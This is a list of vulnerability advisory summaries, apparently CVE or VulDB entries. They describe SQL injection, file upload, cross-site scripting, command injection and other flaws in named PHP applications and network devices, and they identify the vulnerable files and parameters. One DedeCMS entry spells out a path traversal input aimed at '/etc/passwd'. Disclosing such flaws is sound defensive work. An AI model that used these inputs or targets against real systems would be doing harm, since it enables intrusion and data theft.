A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_first_payment.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265093 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file updateproduct.php. The manipulation of the argument ITEM leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265084.
A vulnerability was found in SourceCodester Simple Inventory System 1.0. It has been classified as critical. This affects an unknown part of the file tableedit.php. The manipulation of the argument from/to leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-265083.
A vulnerability was found in SourceCodester Simple Inventory System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updateprice.php. The manipulation of the argument ITEM leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-265082 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Simple Inventory System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-265081 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Inventory System 1.0. Affected is an unknown function of the file /tableedit.php#page=editprice. The manipulation of the argument itemnumber leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265080.
A vulnerability classified as problematic was found in Hipcam Device up to 20240511. This vulnerability affects unknown code of the file /log/wifi.mac of the component MAC Address Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-265078 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Victor Zsviot Camera 8.26.31. This affects an unknown part of the component MQTT Packet Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265077 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This issue affects some unknown processing of the file view_payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265073 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265072.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Online Mens Salon Management System 1.0. Affected by this issue is some unknown functionality of the file view_service.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264926 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in PHPGurukul Online Course Registration System 3.1. Affected by this vulnerability is an unknown functionality of the file /pincode-verification.php. The manipulation of the argument pincode leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264925 was assigned to this vulnerability.
A vulnerability classified as critical has been found in PHPGurukul Online Course Registration System 3.1. Affected is an unknown function of the file /onlinecourse/. The manipulation of the argument regno leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264924.
A vulnerability was found in PHPGurukul Online Course Registration System 3.1. It has been rated as critical. This issue affects some unknown processing of the file news-details.php. The manipulation of the argument nid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264923.
A vulnerability was found in PHPGurukul Online Course Registration System 3.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264922 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Gas Agency Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264748.
A vulnerability, which was classified as critical, was found in Wangshen SecGate 3600 up to 20240516. This affects an unknown part of the file /?g=log_import_save. The manipulation of the argument reqfile leads to unrestricted upload. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-264747.
A vulnerability, which was classified as critical, has been found in Codezips E-Commerce Site 1.0. Affected by this issue is some unknown functionality of the file admin/editproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264746 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in code-projects Budget Management 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument edit leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264745 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Student Management System 1.0. Affected is an unknown function of the file /student/controller.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264744.
A vulnerability was found in SourceCodester Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264743.
A vulnerability was found in SourceCodester Online Birth Certificate Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264742 is the identifier assigned to this vulnerability.
A vulnerability was found in Emlog Pro 2.3.4. It has been classified as problematic. This affects an unknown part of the component Cookie Handler. The manipulation of the argument AuthCookie leads to improper authentication. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-264741 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Emlog Pro 2.3.4 and classified as critical. Affected by this issue is some unknown functionality of the file admin/setting.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264740. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in code-projects Simple Chat System 1.0. This issue affects some unknown processing of the component Message Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264539.
A vulnerability, which was classified as problematic, was found in code-projects Simple Chat System 1.0. Affected is an unknown function of the file /register.php. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264540.
A vulnerability classified as critical was found in code-projects Simple Chat System 1.0. This vulnerability affects unknown code of the file /register.php. The manipulation of the argument name/number/address leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264538 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in code-projects Simple Chat System 1.0. This affects an unknown part of the file /login.php. The manipulation of the argument email/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264537 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Interactive Map with Marker 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file Marker Name of the component Add Marker. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264536.
A vulnerability was found in SourceCodester Interactive Map with Marker 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete-mark.php. The manipulation of the argument mark leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264535.
A vulnerability was found in SourceCodester SchoolWebTech 1.0. It has been classified as critical. Affected is an unknown function of the file /improve/home.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264534 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000-40 V31R02B1413C and classified as critical. This issue affects some unknown processing of the file /useratte/resmanage.php. The manipulation of the argument load leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264533 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000-40 V31R02B1413C and classified as critical. This vulnerability affects unknown code of the file /firewall/urlblist.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264532. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DAR-7000-40 V31R02B1413C. This affects an unknown part of the file /url/url.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264531. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000-40 V31R02B1413C. Affected by this issue is some unknown functionality of the file /useratte/resmanage.php. The manipulation of the argument file leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264530 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in D-Link DAR-7000-40 V31R02B1413C. Affected by this vulnerability is an unknown functionality of the file /user/onlineuser.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264529 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in D-Link DAR-7000-40 V31R02B1413C. Affected is an unknown function of the file interface/sysmanage/licenseauthorization.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264528. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability was found in SourceCodester Online Art Gallery Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/adminHome.php. The manipulation of the argument sliderpic leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264481 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file view_parcel.php. The manipulation of the argument id leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264480.
A vulnerability has been found in SourceCodester Simple Online Bidding System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/index.php?page=manage_product. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264469 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Bidding System 1.0. Affected is an unknown function of the file /simple-online-bidding-system/admin/index.php?page=manage_user. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264468.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Online Bidding System 1.0. This issue affects some unknown processing of the file /simple-online-bidding-system/admin/index.php?page=view_udet. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264467.
A vulnerability classified as critical was found in SourceCodester Simple Online Bidding System 1.0. This vulnerability affects unknown code of the file /simple-online-bidding-system/index.php?page=view_prod. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264466 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file /simple-online-bidding-system/admin/ajax.php?action=save_user. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264465 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=delete_category. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264464.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=save_product. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264463.
A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /intrams_sams/manage_student.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264462 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /intrams_sams/manage_course.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264461 was assigned to this vulnerability.
A vulnerability has been found in Codezips E-Commerce Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/addproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264460.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Image Stack Website 1.0. This affects an unknown part. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264459.
A vulnerability classified as critical has been found in SourceCodester Employee and Visitor Gate Pass Logging System 1.0. Affected is an unknown function of the file /employee_gatepass/classes/Users.php?f=ssave. The manipulation of the argument img leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264456.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file registerH.php. The manipulation of the argument ima leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264455.
A vulnerability was found in Campcodes Online Examination System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /adminpanel/admin/query/addCourseExe.php. The manipulation of the argument course_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264454 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Examination System 1.0. It has been classified as critical. This affects an unknown part of the file updateQuestion.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264453 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file submitAnswerExe.php. The manipulation of the argument exmne_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264452.
A vulnerability has been found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file selExamAttemptExe.php. The manipulation of the argument thisId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264451.
A vulnerability, which was classified as critical, was found in Campcodes Online Examination System 1.0. Affected is an unknown function of the file result.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264450 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Online Examination System 1.0. This issue affects some unknown processing of the file ranking-exam.php. The manipulation of the argument exam_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264449 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Online Examination System 1.0. This vulnerability affects unknown code of the file exam.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264448.
A vulnerability classified as critical has been found in Campcodes Online Examination System 1.0. This affects an unknown part of the file addExamExe.php. The manipulation of the argument examTitle leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264447.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /view/student_exam_mark_update_form.php. The manipulation of the argument exam leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264446 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264445 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /view/student_due_payment.php. The manipulation of the argument due_year leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264444.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument index leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264443.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/show_student2.php. The manipulation of the argument grade leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264442 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/show_student1.php. The manipulation of the argument grade leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264441 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Kashipara College Management System 1.0. Affected is an unknown function of the file view_students_each_detail.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264438 is the identifier assigned to this vulnerability.
A vulnerability was found in Byzoro Smart S200 Management Platform up to 20240507. It has been rated as critical. This issue affects some unknown processing of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264437 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017. It has been declared as critical. This vulnerability affects unknown code of the file /general/meeting/manage/delete.php. The manipulation of the argument M_ID_STR leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264436. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
The APK file in Cloud Smart Lock v2.0.1 has a leaked a URL that can call an API for binding physical devices. This vulnerability allows attackers to arbitrarily construct a request to use the app to bind to unknown devices by finding a valid serial number via a bruteforce attack.
A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/SystemSettings.php?f=update_settings. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263941 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file admin_class.php. The manipulation of the argument type with the input 1 leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263940.
A vulnerability was found in Campcodes Online Laundry Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263939.
A vulnerability has been found in Campcodes Online Laundry Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file manage_user.php of the component HTTP Request Parameter Handler. The manipulation of the argument id leads to improper control of resource identifiers. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263938 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Ruijie RG-UAC up to 20240506. This affects an unknown part of the file /view/networkConfig/GRE/gre_add_commit.php. The manipulation of the argument name/remote/local/IP leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263937 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Ruijie RG-UAC up to 20240506. Affected by this issue is some unknown functionality of the file /view/bugSolve/viewData/detail.php. The manipulation of the argument filename leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263936. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Ruijie RG-UAC up to 20240506. Affected by this vulnerability is an unknown functionality of the file /view/networkConfig/RouteConfig/StaticRoute/static_route_edit_commit.php. The manipulation of the argument oldipmask/oldgateway leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263935. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Ruijie RG-UAC up to 20240506. Affected is an unknown function of the file /view/networkConfig/physicalInterface/interface_commit.php. The manipulation of the argument name leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-263934 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Open Source Clinic Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file setting.php. The manipulation of the argument logo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263929 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Kashipara College Management System 1.0. Affected is an unknown function of the file delete_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263928.
A vulnerability, which was classified as critical, has been found in Kashipara College Management System 1.0. This issue affects some unknown processing of the file delete_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263927.
A vulnerability classified as critical was found in Kashipara College Management System 1.0. This vulnerability affects unknown code of the file each_extracurricula_activities.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263926 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Kashipara College Management System 1.0. This affects an unknown part of the file edit_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263925 was assigned to this vulnerability.
A vulnerability was found in Kashipara College Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file edit_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263924.
A vulnerability was found in Kashipara College Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file submit_admin.php. The manipulation of the argument phone leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263923.
A vulnerability was found in Kashipara College Management System 1.0. It has been classified as critical. Affected is an unknown function of the file submit_extracurricular_activity.php. The manipulation of the argument activity_datetime leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263922 is the identifier assigned to this vulnerability.
A vulnerability was found in Kashipara College Management System 1.0 and classified as critical. This issue affects some unknown processing of the file submit_new_faculty.php. The manipulation of the argument address leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263921 was assigned to this vulnerability.
A vulnerability has been found in Kashipara College Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file submit_student.php. The manipulation of the argument date_of_birth leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263920.
A vulnerability, which was classified as critical, was found in Kashipara College Management System 1.0. This affects an unknown part of the file view_each_faculty.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263919.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file /admin/maintenance/manage_brand.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263918 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /ajax.php. The manipulation of the argument name/customer_name/username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263896.
A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been classified as critical. This affects an unknown part of the file /manage_inv.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263895.
A vulnerability was found in Campcodes Online Laundry Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263894 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Online Laundry Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_receiving.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263893 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Online Laundry Management System 1.0. Affected is an unknown function of the file /manage_laundry.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263892.
A vulnerability, which was classified as critical, has been found in Campcodes Online Laundry Management System 1.0. This issue affects some unknown processing of the file /admin_class.php. The manipulation of the argument id/delete_category/delete_inv/delete_laundry/delete_supply/delete_user/login/save_inv/save_user leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263891.
A vulnerability classified as critical was found in Contemporary Control System BASrouter BACnet BASRT-B 2.7.2. This vulnerability affects unknown code of the component Application Protocol Data Unit. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263890 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in DedeCMS 5.7.114. This affects an unknown part of the file /sys_verifies.php?action=view. The manipulation of the argument filename with the input ../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263889 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument new_client leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263824.
A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/vendor. The manipulation of the argument company_name/mobile leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263823.
A vulnerability was found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/tax. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263822 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/tasks. The manipulation of the argument task_subject leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263821 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Legal Case Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/service. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263810 is the identifier assigned to this vulnerability.
